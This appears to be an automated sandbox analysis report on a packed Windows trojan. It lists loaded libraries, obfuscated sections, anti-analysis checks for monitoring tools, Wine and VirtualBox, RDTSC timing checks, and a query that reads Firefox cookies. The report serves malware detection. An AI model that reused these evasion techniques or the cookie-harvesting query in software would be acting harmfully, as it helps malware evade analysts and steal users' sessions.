              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008782DF0_2_008782DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088A3870_2_0088A387
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A1B610_2_008A1B61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089E4D00_2_0089E4D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088F4D60_2_0088F4D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008944770_2_00894477
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008995BE0_2_008995BE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072C6220_2_0072C622
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AB6F00_2_007AB6F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091EE2D0_2_0091EE2D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088BF4F0_2_0088BF4F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00895F760_2_00895F76
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 004D4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: woldotvo ZLIB complexity 0.9947469682835821
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_004F3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ECAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_004ECAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\592UF6CX.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1821184 > 1048576
              Source: file.exeStatic PE information: Raw size of woldotvo is bigger than: 0x100000 < 0x1a2c00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;woldotvo:EW;cpkeohyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;woldotvo:EW;cpkeohyv:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1caf36 should be: 0x1c4095
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: woldotvo
              Source: file.exeStatic PE information: section name: cpkeohyv
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 1AFE69DFh; mov dword ptr [esp], ebp0_2_0080C0EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push esi; mov dword ptr [esp], edi0_2_0080C0F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 1EDA473Dh; mov dword ptr [esp], ebp0_2_0080C147
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push ecx; mov dword ptr [esp], eax0_2_0080C16A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 7544F743h; mov dword ptr [esp], ecx0_2_0080C186
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 09F8C1EDh; mov dword ptr [esp], ebx0_2_0080C1A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 59208566h; mov dword ptr [esp], ecx0_2_0080C26C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 4E3657E5h; mov dword ptr [esp], ebp0_2_0080C2B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 5F9293C1h; mov dword ptr [esp], esi0_2_008A014D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 3E38ECA4h; mov dword ptr [esp], esi0_2_008A0257
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push eax; mov dword ptr [esp], edi0_2_008A0281
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ecx; mov dword ptr [esp], ebx0_2_008A02C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 631E358Eh; mov dword ptr [esp], edx0_2_008A038E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ecx; mov dword ptr [esp], edi0_2_008A03F6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 436AC2BAh; mov dword ptr [esp], ebx0_2_008A0443
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ecx; mov dword ptr [esp], 00000004h0_2_008A0461
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ecx; mov dword ptr [esp], esi0_2_008A0515
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push edi; mov dword ptr [esp], ecx0_2_008A05B2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 6D4C7BA4h; mov dword ptr [esp], esi0_2_008A06A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push edi; mov dword ptr [esp], ecx0_2_008A06B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ebx; mov dword ptr [esp], edx0_2_008A0707
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ebp; mov dword ptr [esp], ecx0_2_008A0764
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 578C7B00h; mov dword ptr [esp], eax0_2_008A0791
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push eax; mov dword ptr [esp], 80018004h0_2_008A0795
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push esi; mov dword ptr [esp], eax0_2_008A07D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ecx; mov dword ptr [esp], edi0_2_008A07E2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 374D040Bh; mov dword ptr [esp], ecx0_2_008A07EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ebp; mov dword ptr [esp], esi0_2_008A0863
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push 5BBECADBh; mov dword ptr [esp], eax0_2_008A08A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push ecx; mov dword ptr [esp], edx0_2_008A08BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A009A push edi; mov dword ptr [esp], edx0_2_008A094E
              Source: file.exeStatic PE information: section name: woldotvo entropy: 7.953105657448845

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25991
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7478 second address: 8A748E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F052CEB1F1Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6609 second address: 8A6620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F052CBC210Ah 0x0000000b jo 00007F052CBC210Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A676E second address: 8A677A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A677A second address: 8A678A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F052CBC2106h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A678A second address: 8A6799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 js 00007F052CEB1F16h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A68BA second address: 8A68D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CBC210Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6A40 second address: 8A6A45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6A45 second address: 8A6A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F052CBC2106h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6A51 second address: 8A6A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F052CEB1F16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6A60 second address: 8A6A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6A64 second address: 8A6A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8E9E second address: 8A8EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007F052CBC2110h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F052CBC2112h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007F052CBC2116h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A905A second address: 8A905F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A905F second address: 8A9069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9069 second address: 8A908D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A908D second address: 8A9092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9092 second address: 8A90C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jl 00007F052CEB1F16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F052CEB1F28h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90C3 second address: 8A90C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A91FE second address: 8A9216 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9216 second address: 8A921A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A92E5 second address: 8A92EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A92EB second address: 8A92EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A92EF second address: 8A92F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A92F3 second address: 8A9335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F052CBC2117h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 jg 00007F052CBC2116h 0x00000019 jmp 00007F052CBC2110h 0x0000001e pop ebx 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9335 second address: 8A933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9525 second address: 8A9540 instructions: 0x00000000 rdtsc 0x00000002 je 00007F052CBC210Ch 0x00000008 jo 00007F052CBC2106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jp 00007F052CBC2106h 0x0000001a pop edi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9540 second address: 8A9545 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C86A8 second address: 8C86AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8A92 second address: 8C8A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8C32 second address: 8C8C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8C36 second address: 8C8C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8C3E second address: 8C8C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8C42 second address: 8C8C54 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8C54 second address: 8C8C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8C58 second address: 8C8C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8F1B second address: 8C8F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8F1F second address: 8C8F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8F23 second address: 8C8F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C96A3 second address: 8C96D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F21h 0x00000007 jmp 00007F052CEB1F29h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C96D1 second address: 8C96D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEE38 second address: 8BEE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA0F1 second address: 8CA0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA0F5 second address: 8CA10F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jc 00007F052CEB1F16h 0x00000011 pop edx 0x00000012 jc 00007F052CEB1F1Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA10F second address: 8CA129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F052CBC2112h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F073 second address: 88F093 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F052CEB1F1Bh 0x00000010 popad 0x00000011 pushad 0x00000012 jnc 00007F052CEB1F16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F093 second address: 88F0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F052CBC2106h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D05FA second address: 8D061C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jo 00007F052CEB1F16h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D061C second address: 8D0620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D45F7 second address: 8D4607 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F052CEB1F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4607 second address: 8D460B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D460B second address: 8D4637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F052CEB1F23h 0x0000000e popad 0x0000000f push ebx 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4637 second address: 8D4650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F052CBC2112h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4650 second address: 8D4654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4654 second address: 8D465A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D47C4 second address: 8D47CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D47CA second address: 8D47CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D48FB second address: 8D4946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F052CEB1F16h 0x0000000e popad 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F052CEB1F24h 0x00000017 pop esi 0x00000018 jmp 00007F052CEB1F1Fh 0x0000001d pushad 0x0000001e push edx 0x0000001f pop edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 push edx 0x00000023 pop edx 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 jnp 00007F052CEB1F52h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4946 second address: 8D494C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
